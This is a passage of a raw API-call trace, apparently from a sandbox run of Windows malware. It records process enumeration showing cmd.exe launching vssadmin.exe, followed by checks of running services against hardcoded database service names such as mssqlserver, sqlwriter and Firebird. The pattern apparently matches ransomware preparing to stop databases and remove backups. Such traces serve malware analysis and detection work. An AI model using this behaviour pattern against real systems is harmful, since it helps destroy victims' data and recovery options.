hSnapshot=0x190, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x15c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spectrum.exe")) returned 1 [0033.385] lstrlenW (lpString="spectrum.exe") returned 12 [0033.385] Process32NextW (in: hSnapshot=0x190, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dies.exe")) returned 1 [0033.385] lstrlenW (lpString="dies.exe") returned 8 [0033.385] Process32NextW (in: hSnapshot=0x190, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configured.exe")) returned 1 [0033.386] lstrlenW (lpString="configured.exe") returned 14 [0033.386] Process32NextW (in: hSnapshot=0x190, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rememberkatrina.exe")) returned 1 [0033.387] lstrlenW (lpString="rememberkatrina.exe") returned 19 [0033.387] Process32NextW (in: hSnapshot=0x190, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x488, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fast.exe")) returned 1 [0033.387] lstrlenW (lpString="fast.exe") returned 8 [0033.387] Process32NextW (in: hSnapshot=0x190, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="berkeley-challenges-binding.exe")) returned 1 [0033.388] lstrlenW (lpString="berkeley-challenges-binding.exe") returned 31 [0033.388] Process32NextW (in: hSnapshot=0x190, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="review.exe")) returned 1 [0033.388] lstrlenW (lpString="review.exe") returned 10 [0033.388] Process32NextW (in: hSnapshot=0x190, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x328, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="historybinding.exe")) returned 1 [0033.389] lstrlenW (lpString="historybinding.exe") returned 18 [0033.389] Process32NextW (in: hSnapshot=0x190, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pk task surge.exe")) returned 1 [0033.390] lstrlenW (lpString="pk task surge.exe") returned 17 [0033.390] Process32NextW (in: hSnapshot=0x190, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0033.390] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0033.390] Process32NextW (in: hSnapshot=0x190, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="mobsync.exe")) returned 1 [0033.391] lstrlenW (lpString="mobsync.exe") returned 11 [0033.391] Process32NextW (in: hSnapshot=0x190, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0033.392] lstrlenW (lpString="dllhost.exe") returned 11 [0033.392] Process32NextW (in: hSnapshot=0x190, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0033.393] lstrlenW (lpString="dllhost.exe") returned 11 [0033.393] Process32NextW (in: hSnapshot=0x190, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ivttvf.exe")) returned 1 [0033.394] lstrlenW (lpString="ivttvf.exe") returned 10 [0033.394] Process32NextW (in: hSnapshot=0x190, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa90, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0033.394] lstrlenW (lpString="cmd.exe") returned 7 [0033.394] Process32NextW (in: hSnapshot=0x190, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0033.395] lstrlenW (lpString="conhost.exe") returned 11 [0033.395] Process32NextW (in: hSnapshot=0x190, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa9c, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1 [0033.396] lstrlenW (lpString="vssadmin.exe") returned 12 [0033.396] Process32NextW (in: hSnapshot=0x190, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa9c, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 0 [0033.396] CloseHandle (hObject=0x190) returned 1 [0033.396] Sleep (dwMilliseconds=0x1f4) [0034.781] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x5efb98 [0034.781] EnumServicesStatusExW (in: hSCManager=0x5efb98, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x217ff44, lpServicesReturned=0x217ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x217ff44, lpServicesReturned=0x217ff5c, lpResumeHandle=0x0) returned 0 [0034.782] GetLastError () returned 0xea [0034.782] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x11e4) returned 0x661da0 [0034.782] EnumServicesStatusExW (in: hSCManager=0x5efb98, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x661da0, cbBufSize=0x11e4, pcbBytesNeeded=0x217ff44, lpServicesReturned=0x217ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x661da0, pcbBytesNeeded=0x217ff44, lpServicesReturned=0x217ff5c, lpResumeHandle=0x0) returned 1 [0034.785] CloseServiceHandle (hSCObject=0x5efb98) returned 1 [0034.785] lstrlenW (lpString="Appinfo") returned 7 [0034.785] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0034.785] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0034.785] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0034.785] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0034.785] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0034.785] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0034.785] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0034.785] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0034.785] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0034.785] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0034.785] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0034.785] lstrlenW (lpString="AudioSrv") returned 8 [0034.785] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0034.785] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0034.785] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0034.785] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0034.785] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0034.785] lstrlenW (lpString="BFE") returned 3 [0034.785] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0034.785] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0034.785] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0034.785] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0034.785] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0034.785] lstrlenW (lpString="CryptSvc") returned 8 [0034.785] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0034.785] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0034.786] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0034.786] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0034.786] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0034.786] lstrlenW (lpString="CscService") returned 10 [0034.786] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0034.786] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0034.786] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0034.786] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0034.786] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0034.786] lstrlenW (lpString="DcomLaunch") returned 10 [0034.786] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0034.786] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0034.786] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0034.786] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0034.786] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0034.786] lstrlenW (lpString="Dhcp") returned 4 [0034.786] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0034.786] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0034.786] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0034.786] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0034.786] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0034.786] lstrlenW (lpString="Dnscache") returned 8 [0034.786] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0034.786] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0034.786] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0034.786] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0034.786] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0034.786] lstrlenW (lpString="DPS") returned 3 [0034.786] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0034.786] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0034.786] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0034.786] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0034.786] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0034.786] lstrlenW (lpString="eventlog") returned 8 [0034.786] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0034.786] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0034.786] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0034.786] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0034.787] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0034.787] lstrlenW (lpString="EventSystem") returned 11 [0034.787] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0034.787] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0034.787] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0034.787] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0034.787] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0034.787] lstrlenW (lpString="gpsvc") returned 5 [0034.787] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0034.787] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0034.787] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0034.787] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0034.787] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0034.787] lstrlenW (lpString="iphlpsvc") returned 8 [0034.787] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0034.787] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0034.787] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0034.787] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0034.787] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0034.787] lstrlenW (lpString="LanmanServer") returned 12 [0034.787] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0034.787] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0034.787] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0034.787] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0034.787] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0034.787] lstrlenW (lpString="LanmanWorkstation") returned 17 [0034.787] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0034.787] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0034.787] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0034.787] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0034.787] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0034.787] lstrlenW (lpString="lmhosts") returned 7 [0034.787] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0034.787] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0034.787] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0034.787] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0034.787] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0034.788] lstrlenW (lpString="MMCSS") returned 5 [0034.788] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0034.788] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0034.788] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0034.788] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0034.788] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0034.788] lstrlenW (lpString="MpsSvc") returned 6 [0034.788] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0034.788] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0034.788] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0034.788] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0034.788] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0034.788] lstrlenW (lpString="Netman") returned 6 [0034.788] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Netman") returned -1 [0034.788] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Netman") returned -1 [0034.788] lstrcmpiW (lpString1="sqlwriter", lpString2="Netman") returned 1 [0034.788] lstrcmpiW (lpString1="mssqlserver", lpString2="Netman") returned -1 [0034.788] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Netman") returned 1 [0034.788] lstrlenW (lpString="netprofm") returned 8 [0034.788] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0034.788] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0034.788] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0034.788] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0034.788] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0034.788] lstrlenW (lpString="NlaSvc") returned 6 [0034.788] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0034.788] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0034.788] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0034.788] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0034.788] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0034.788] lstrlenW (lpString="nsi") returned 3 [0034.788] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0034.788] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0034.788] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0034.788] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0034.788] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0034.789] lstrlenW (lpString="PcaSvc") returned 6 [0034.789] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0034.789] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0034.789] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0034.789] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0034.789] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0034.789] lstrlenW (lpString="PlugPlay") returned 8 [0034.789] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0034.789] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0034.789] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0034.789] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0034.789] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0034.789] lstrlenW (lpString="Power") returned 5 [0034.789] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0034.789] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0034.789] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0034.789] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0034.789] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0034.789] lstrlenW (lpString="ProfSvc") returned 7 [0034.789] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0034.789] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0034.789] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0034.789] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0034.789] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0034.789] lstrlenW (lpString="RpcEptMapper") returned 12 [0034.789] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0034.789] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0034.789] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0034.789] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0034.789] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0034.789] lstrlenW (lpString="RpcSs") returned 5 [0034.789] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0034.789] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0034.789] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0034.789] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0034.790] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0034.790] lstrlenW (lpString="SamSs") returned 5 [0034.790] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0034.790] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0034.790] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0034.790] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0034.790] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0034.790] lstrlenW (lpString="Schedule") returned 8 [0034.790] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0034.790] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0034.790] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0034.790] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0034.790] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0034.790] lstrlenW (lpString="SENS") returned 4 [0034.790] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0034.790] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0034.790] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0034.790] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0034.790] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0034.790] lstrlenW (lpString="ShellHWDetection") returned 16 [0034.790] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0034.790] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0034.790] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0034.790] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0034.790] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0034.790] lstrlenW (lpString="Spooler") returned 7 [0034.790] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0034.790] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0034.790] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0034.790] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0034.790] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0034.790] lstrlenW (lpString="SysMain") returned 7 [0034.790] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0034.790] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0034.790] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0034.790] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0034.790] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0034.791] lstrlenW (lpString="Themes") returned 6 [0034.791] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0034.791] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0034.791] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0034.791] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0034.791] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0034.791] lstrlenW (lpString="TrkWks") returned 6 [0034.791] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1 [0034.791] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1 [0034.791] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1 [0034.791] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1 [0034.791] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1 [0034.791] lstrlenW (lpString="UxSms") returned 5 [0034.791] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0034.791] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0034.791] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0034.791] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0034.791] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0034.791] lstrlenW (lpString="WdiServiceHost") returned 14 [0034.791] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiServiceHost") returned -1 [0034.791] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiServiceHost") returned -1 [0034.791] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiServiceHost") returned -1 [0034.791] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiServiceHost") returned -1 [0034.791] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiServiceHost") returned -1 [0034.791] lstrlenW (lpString="WdiSystemHost") returned 13 [0034.791] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiSystemHost") returned -1 [0034.791] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiSystemHost") returned -1 [0034.791] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiSystemHost") returned -1 [0034.791] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiSystemHost") returned -1 [0034.791] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiSystemHost") returned -1 [0034.791] lstrlenW 